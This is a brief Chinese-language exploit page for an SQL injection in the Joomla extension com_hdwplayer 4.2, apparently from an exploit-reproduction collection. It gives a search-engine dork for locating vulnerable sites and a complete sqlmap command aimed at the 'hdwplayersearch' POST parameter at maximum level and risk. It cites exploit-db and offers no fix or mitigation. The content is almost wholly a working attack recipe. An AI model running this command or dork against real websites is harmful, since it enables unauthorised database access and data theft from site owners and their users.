008-Joomla com_hdwplayer 4.2 – ‘search.php’ sql注入

# Joomla com_hdwplayer 4.2 – ‘search.php’ sql注入

### 一、漏洞简介

关键字:`inurl:”index.php?option=com_hdwplayer”`

### 二、漏洞影响

com_hdwplayer 4.2

### 三、复现过程

“`python
python ./sqlmap.py -u “http://127.0.0.1/joomla/index.php” –method=POST –random-agent –data “option=com_hdwplayer&view=search&hdwplayersearch=xxx” –level=5 –risk=3 –dbms=mysql -p hdwplayersearch
“`

**参考链接**

https://www.exploit-db.com/exploits/48242

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容